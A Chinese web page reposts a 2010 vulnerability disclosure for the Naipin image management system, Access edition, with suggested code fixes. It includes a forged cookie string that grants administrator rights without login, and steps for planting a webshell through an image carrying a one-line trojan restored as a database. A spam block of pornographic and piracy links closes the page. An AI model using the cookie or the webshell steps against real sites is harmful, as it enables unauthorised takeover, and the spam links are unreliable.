<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關(guān)鍵字專題1關(guān)鍵字專題50關(guān)鍵字專題500關(guān)鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關(guān)鍵字專題關(guān)鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當(dāng)前位置: 首頁 - 科技 - 知識百科 - 正文

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        來源:懂視網(wǎng) 責(zé)編:小采 時間:2020-11-09 08:23:23
        文檔

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改
        推薦度:
        導(dǎo)讀耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改

        發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改Cookie拿到 管理

        發(fā)布日期:2010-10.08
        發(fā)布作者:redice

        影響版本:20100906 Access版
        官方地址:http://www.naipin.com/

        漏洞類型:Cookie欺騙
        漏洞描述:大概一年前我發(fā)現(xiàn)了《耐品圖片管理系統(tǒng)Access版》有Cookie欺騙漏洞:任意用戶可以通過修改Cookie拿到管理員權(quán)限。


        今年6月份我給耐品技術(shù)發(fā)了郵件,告知了這個漏洞,他們回復(fù)如下:

        ”您好,謝謝您的提醒!
        祝您合家幸福安康!“

        今天我下載了最新版(Naipin_T_20100906_acc.rar)進行了測試,發(fā)現(xiàn)這個漏洞仍然存在。
        既然官方如此不重視,我就它放出來。


        Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL

        利用上面的cookie不登錄也能拿到管理員權(quán)限...


        拿Webshell的一種思路:

        如果數(shù)據(jù)庫后綴名是asp的,可以采用該思路。上傳用戶圖像,上傳一張含有一句話木馬的圖片(采用edjpgcom工具)。
        進入后臺,使用數(shù)據(jù)庫恢復(fù)功能將上傳的圖片恢復(fù)為數(shù)據(jù)庫。

        修復(fù)方案:臨時修補辦法如下:

        (1)Admin_ChkLogin.asp第66行下增加如下代碼:
        session("GroupId")=Rs("GroupId")

        (2)將clsMain.asp的第112行改為如下代碼:
        UserGroupId=session("GroupID")

        (3)建議盡量做到:能寫入的目錄不給執(zhí)行權(quán)限,能執(zhí)行的目錄不給寫入權(quán)限。

        標(biāo)簽分類: cookie欺騙 驗證漏洞

        聲明:本網(wǎng)頁內(nèi)容旨在傳播知識,若有侵權(quán)等問題請及時與本網(wǎng)聯(lián)系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞

        耐品圖片管理系統(tǒng)Access版Cookie欺騙漏洞:發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改
        推薦度:
        標(biāo)簽: 圖片 cookie 漏洞
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 亚洲免费观看视频| 亚洲一区二区三区深夜天堂| 在线播放免费人成视频在线观看| 插B内射18免费视频| 亚洲国产人成中文幕一级二级| 亚洲精品无AMM毛片| 两个人日本免费完整版在线观看1| 国产gav成人免费播放视频| 精品一区二区三区无码免费视频| 最近中文字幕免费mv视频7| 亚洲日本在线播放| a级毛片高清免费视频就| 午夜性色一区二区三区免费不卡视频| 日韩一品在线播放视频一品免费| 亚洲性猛交XXXX| 中文字幕免费不卡二区| 国产成人aaa在线视频免费观看| 亚洲伊人tv综合网色| 亚洲色偷偷色噜噜狠狠99| 久久免费视频一区| 午夜视频在线在免费| 久久久久亚洲国产AV麻豆| 中文字幕在线免费| 亚洲国产中文在线视频| a级毛片免费全部播放| 久久久亚洲欧洲日产国码农村| 羞羞漫画在线成人漫画阅读免费 | 亚洲一区二区三区夜色| 4虎永免费最新永久免费地址| 亚洲精品国精品久久99热一| 无码一区二区三区亚洲人妻| 亚洲高清中文字幕免费| 亚洲高清国产拍精品熟女| 久久精品亚洲男人的天堂| 国产综合激情在线亚洲第一页| 免费下载成人电影| 美女黄频免费网站| 亚洲精品亚洲人成在线麻豆| 三年片在线观看免费大全电影| 亚洲日韩精品无码专区网址| 57PAO成人国产永久免费视频|